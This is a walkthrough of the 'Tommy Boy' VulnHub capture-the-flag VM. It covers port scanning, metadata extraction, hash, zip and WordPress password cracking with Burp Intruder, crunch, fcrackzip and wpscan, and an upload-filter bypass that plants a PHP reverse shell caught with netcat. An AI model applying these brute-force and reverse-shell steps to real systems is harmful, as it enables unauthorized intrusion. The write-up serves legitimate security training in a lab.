Tommy Boy is an awesome VulnHub VM with an awesome story inside. The objective of this machine is to restore a backup of a website, The Callahan Auto company and collect 5 flags to unlock a final message. Let’s start!
First of all scan the website IP with nmap:
nmap 192.168.1.15 -A
This is the output:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:13 CEST Nmap scan report for 192.168.1.15 Host is up (0.0027s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA) |_ 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 4 disallowed entries | /6packsofb...soda /lukeiamyourfather |_/lookalivelowbridge /flag-numero-uno.txt |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Welcome to Callahan Auto 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: KEEP OUT Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds
There are 3 services running on the machine, 2 website and an ssh. Open 192.168.1.15 on the browser and you will see an error message saying that I need to restore the backup of the website. Analyzing the source code of the page I notice this:
<!--Comment from Nick: backup copy is in Big Tom's home folder--> <!--Comment from Richard: can you give me access too? Big Tom's the only one w/password--> <!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time--> <!--Comment from Richard: please, I'll ask nicely--> <!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog--> <!--Comment from Richard: Deal. Where's the blog again?--> <!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> <!--Comment from Richard: Ah! How could I forget? Thanks-->
There is an hidden blog of the company stored into an hidden folder which name should be guessed watching the YouTube video linked into the comments. The video is just a phrase “Hey Prehistoric Forest”, so try to open /prehistoricforest. It works, we are into the company blog! Before analyzing it, open /robots.txt which has interesting entries as nmap said:
User-agent: * Disallow: /6packsofb...soda Disallow: /lukeiamyourfather Disallow: /lookalivelowbridge Disallow: /flag-numero-uno.txt
There are 3 folder which contain some images which I can ignore and a .txt file, the first flag. Just browse to /flag-numero-uno.txt, the first flag is: B34rcl4ws. Now we can analyze the blog.
Open the blog again and start read the posts. There is a message by richard which is protected by a password that I need to find. The latest post on the blog it’s a request by Tom Jr. asking to richard the password of the post and there is a comment, read it:
Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory. Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.
So let’s navigate to /richard and download the image shockedrichard.jpg. I am pretty sure that the password is hidden into the image comment, I used exiftool to extract it:
This is the output:
ExifTool Version Number : 10.24 File Name : shockedrichard.jpg Directory : /home/cristiano/Scaricati File Size : 163 kB File Modification Date/Time : 2016:08:01 00:15:25+02:00 File Access Date/Time : 2016:08:01 00:16:30+02:00 File Inode Change Date/Time : 2016:08:01 00:15:25+02:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : None X Resolution : 1 Y Resolution : 1 Exif Byte Order : Little-endian (Intel, II) Software : Google Copyright : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz. Exif Version : 0220 User Comment : ce154b5a8e59c89732bc25d6a2e6b90b Exif Image Width : 1600 Exif Image Height : 1029 XMP Toolkit : Image::ExifTool 9.97 Rights : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz. Creator Tool : Google Profile CMM Type : Lino Profile Version : 2.1.0 Profile Class : Display Device Profile Color Space Data : RGB Profile Connection Space : XYZ Profile Date Time : 1998:02:09 06:49:00 Profile File Signature : acsp Primary Platform : Microsoft Corporation CMM Flags : Not Embedded, Independent Device Manufacturer : IEC Device Model : sRGB Device Attributes : Reflective, Glossy, Positive, Color Rendering Intent : Media-Relative Colorimetric Connection Space Illuminant : 0.9642 1 0.82491 Profile Creator : HP Profile ID : 0 Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company Profile Description : sRGB IEC61966-2.1 Media White Point : 0.95045 1 1.08905 Media Black Point : 0 0 0 Red Matrix Column : 0.43607 0.22249 0.01392 Green Matrix Column : 0.38515 0.71687 0.09708 Blue Matrix Column : 0.14307 0.06061 0.7141 Device Mfg Desc : IEC http://www.iec.ch Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1 Viewing Cond Illuminant : 19.6445 20.3718 16.8089 Viewing Cond Surround : 3.92889 4.07439 3.36179 Viewing Cond Illuminant Type : D50 Luminance : 76.03647 80 87.12462 Measurement Observer : CIE 1931 Measurement Backing : 0 0 0 Measurement Geometry : Unknown Measurement Flare : 0.999% Measurement Illuminant : D65 Technology : Cathode Ray Tube Display Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Current IPTC Digest : adfc7551120fa16884c295b6d397931f Envelope Record Version : 4 Coded Character Set : UTF8 Application Record Version : 4 Copyright Notice : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz. IPTC Digest : adfc7551120fa16884c295b6d397931f Image Width : 1600 Image Height : 1029 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 1600x1029 Megapixels : 1.6
The image comment is:
Seems to be an MD5 hash, decrypt it with HashKiller and you will find the post password: spanky. Now we can read the post; in a few words we need to restore the backup of the website renaming callahanbak.bak, which is located into Big Tom SSH account, to index.html. The SSH user name of Tom is into the list of WordPress users but I don’t have his password. Also there is an FTP service running on the machine listening onto a different default port (21), and this service it’s unstable: every 15 minutes it goes up and down. The FTP user name of richard is nickburns but I need to find the password which seems to be very easy to guess.
Let’s finish to analyze the remaining posts, notice the first post made into this blog, open the comment:
Well put boss 😉 Flag #2: thisisthesecondflagyayyou.txt
Navigate to /prehistoricforest/thisisthesecondflagyayyou.txt and collect the second flag: Z4l1nsky. Now I can go further.
I focus myself to the FTP, so I rescan the IP with the maximum range of ports:
nmap 192.168.1.15 -p 1-65535
And now a wild port appears:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:41 CEST Nmap scan report for 192.168.1.15 Host is up (0.029s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8008/tcp open http 65534/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds
Open ftp command shell and type:
open 192.168.1.15 65534
Now i use nickburns as user name but I need to guess the password which can be egual to user name, so try nickburns as password. Now I am logged into the FTP server, list the file and you will see a readme.txt. Download it:
Close ftp shell and read the file:
There is a message from Nick who says that there is a /NickIzL33t subfolder somewhere in the server where there is an encrypted .zip which contains all Big Tom’s passwords. Also Nick says that I can use that folder as a Dropbox to access my files from the phone. There are no subfolder into 192.168.1.15 but there is another http service which is listening on port 8008, so navigate to 192.168.1.15:8008 and you will see a simple HTML Nick page. Browse to /NickIzL33t and another Nick HTML page appears but seems to be nothing. So I try to change my User-Agent to a mobile device (iOS) with Burpsuite as proxy and when I refreshed the page, it changed! There is a message which says:
Gotta know the EXACT name of the .html to break into this fortress.
So it’s time to do a bruteforce attack. I captured the GET request of the website
with Burpsuite refreshing the page, then I sent it to the Intruder with the following payload:
GET /NickIzL33t/§page§.html HTTP/1.1 Host: 192.168.1.15:8008 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT If-None-Match: "10e-537a322dc0ba6-gzip" Cache-Control: max-age=0
I used rockyou.txt as wordlist and I started the attack. After some minutes I found fallon1.html as an HTML page with response code 200. So I navigate to /NickIzL33t/fallon1.html and the famous page shows up.
I found an hint:
Big Tom, Your password vault is protected with (yep, you guessed it) a PASSWORD! And because you were choosing stupidiculous passwords like "password123" and "brakepad" I enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!! Your password is your wife's nickname "bev" (note it's all lowercase) plus the following: * One uppercase character * Two numbers * Two lowercase characters * One symbol * The year Tommy Boy came out in theaters Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny. LOL -Nick
The 3rd flag: TinyHead and the encrypted .zip file.
Now I need to decrypt the .<ip file which is protected by a password. Fortunately the password has a pattern, so I use crunch to create a custom wordlist:
crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt
Now to decrypt the zip I use fcrackzip:
fcrackzip -u -v -D -p wordlist.txt t0msp4ssw0rdz.zip
After some minutes I found the password: bevH00tr$1995
Unzip the file and open passwords.txt. Interesting section:
Callahan Auto Server ---------------------------- Username: bigtommysenior Password: fatguyinalittlecoat Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are. However, I wrote myself a draft on the company blog with that information. Callahan Company Blog ---------------------------- Username: bigtom(I think?) Password: ??? Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
To find SSH password I need to break into WordPress blog but Big Tom seems to don’t remember his username, I use wpscan to enumerate users:
sudo wpscan -u 192.168.1.15/prehistoricforest --enumerate u
+----+----------+-------------------+ | Id | Login | Name | +----+----------+-------------------+ | 1 | richard | richard | | 2 | tom | Big Tom | | 3 | tommy | Tom Jr. | | 4 | michelle | Michelle Michelle | +----+----------+-------------------+
So Big Tom username is tom but I need to find the password. The hint is a famous Queen song but I think it refers to rockyou.txt wordlist. So I used Burpsuite to bruteforce the login credentials. I intercepted the POST request from /wp-admin with the proxy then I sent to the Intruder the following payload:
POST /prehistoricforest/wp-login.php HTTP/1.1 Host: 192.168.1.15 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.15/prehistoricforest/wp-login.php Cookie: wp-postpass_3604ebf3b5bc65ba9e61d2ca579e65ae=%24P%24B137jyM8khyXYMZ82AEpHgB2Mv9OKi.; wp-settings-time-2=1470085172; wordpress_test_cookie=WP+Cookie+check Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 122 log=tom&pwd=§password§&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.15%2Fprehistoricforest%2Fwp-admin%2F&testcookie=1
I waited some minutes, then I found the login password of tom: tomtom1. It’s time to login. Open Big Tom draft:
Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here: 1938!! Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.
So SSH user name of Big Tom is bigtommysenior and the password is fatguyinalittlecoat1938!!. Login with SSH:
Insert the password and voilà, I am logged into the SSH. List files and you will notice the 4th flag which is EditButton and the backup file. Restore it:
cp callahanbak.bak /var/www/html/index.html
Navigating with your browser to /index.html you will see the home page of the website. Now we need to find the latest flag which is, according to the 4th one, in the root of this server at /5.txt.
Navigating to root directory and listing the file I see that I can’t read .5.txt, only the user www-data can do this, so I need to escalate privileges. Let’s check some directories with special permissions:
find / -perm -2 -type d 2>/dev/null
And an interesting one is showed:
Browse to /NickIzL33t/P4TCH_4D4MS (remember to change the User-Agent) and an upload form appears. Upload a PHP reverse shell as .jpg then rename the file into .php, in fact we have the access to /uploads folder into SSH. Listen locally for the incoming connection:
nc -lvp 1234
Then open /NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php and the shell will be spawned into your local terminal. Just get the latest flag:
Which is: Buttcrack. Now return to the SSH shell, into BIg Tom home folder and unzip LOOT.ZIP. It will require a password which is all the flag putted together: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack. THE-END.txt file will be extracted. Read it. VM is completely pwned!